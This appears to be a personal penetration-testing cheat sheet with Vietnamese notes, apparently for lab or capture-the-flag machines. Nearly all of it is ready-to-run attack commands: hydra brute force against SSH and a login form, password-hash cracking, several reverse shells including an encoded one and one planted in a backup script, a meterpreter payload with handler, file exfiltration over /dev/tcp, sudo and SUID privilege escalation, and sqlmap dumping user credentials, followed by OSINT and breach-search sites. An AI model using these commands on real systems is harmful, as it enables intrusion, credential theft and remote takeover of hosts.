hydra -t 5 -V -f -l anne -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt  192.168.0.105 ssh ( brute force password ssh neu da biet username) 
hydra 192.168.101.10 -s 88 http-form-post "/index.php?module=User&action=Login:__vtrasdsa=sid%279423983289329847sdnkj3849234&username=^USER^&password=^PASS^:Error=1" -l admin -P /usr/share/wordlist/123.txt -t 20 -o crm-attack.txt
zip2john respectmydrip.zip > hash.txt  
john --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt hash.txt

openssl s_client -connect 192.168.0.102:443 -showcerts ( ssl checker)
nmap -sT -v 192.168.0.102 -sC -sV  -T4 :::: nmap -T4 -p- -sC -sV -sT -A -Pn 172.16.86.153 ::::  nmap -sC -sV -sS -p- -v -oN nmap_full_scan 192.168.0.106 

arp-scan -l (giong netdiscover)

bash -i >& /dev/tcp/192.168.0.102/8080 0>&1

( #!bin/bash
  bash -c 'bash -i >& /dev/tcp/192.168.1.101/9001 0>&1' )( chay bang file shell)


nc -e /bin/bash 192.168.10.10 4444 
nc -lvnp 4444

echo 'nc -e /bin/bash 192.168.10.10 4444' | base64 (put_your_encoded_string_here)
echo 'put_your_encoded_string_here' | base64 -d | bash

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.102 7777 >/tmp/f' > backup.sh( neu bai co file backup)

find / -perm -u=s -type f 2>/dev/null ( Getting root account )
nc -lvnp 3333 > reset_root (our terminal) | cat /usr/bin/reset_root > /dev/tcp/192.168.10.10/3333 ( target terminal) : get the file
sqlmap -u "http://192.168.0.107/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --dbms=mysql --batch --level=5 --tables
sqlmap -u "http://192.168.0.107/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs -T odm_user -C  id,username,password  --dump --batch 
python3 -m http.server 8000 --bind 0.0.0.0
gcc 37292.c -o hack
sort fsocity.dic | uniq -u > f.dic

msfvenom --list payload | grep jsp
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4444 -e php/base64 -f raw > file.php
  use exploit/multi/handler
    set payload php/meterpreter/reverse_tcp
    set lhost 192.168.0.104
    set lport 4444
    run
    shell
python -c 'import pty; pty.spawn("/bin/sh")' (nang cap shell len terminal)
python3 -c 'import pty; pty.spawn("/bin/bash")'

nmap --interactive -> !sh

gobuster dir -u http://172.16.86.153 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt  -x php,bak,txt,html -t 60
nikto -h http://192.168.0.106:8080  

exiftool .cypher-neo.png ( lay info cua anh) 
linpeas.sh ( tu dong thu thap thong tin ve muc tieu nhu la cac lo hong)

sudo -l --> sudo /usr/bin/vim -c ':!/bin/sh' (vim) 

https://search.censys.io/
https://www.crunchbase.com/
https://www.semrush.com/
hunter.io
theHarvester -d kali.org -l 500 -b yahoo 
https://app.dehashed.com/search
https://intelx.io/login
osint framework
https://gchq.github.io/CyberChef/
https://attack.mitre.org/
https://www.criminalip.io/


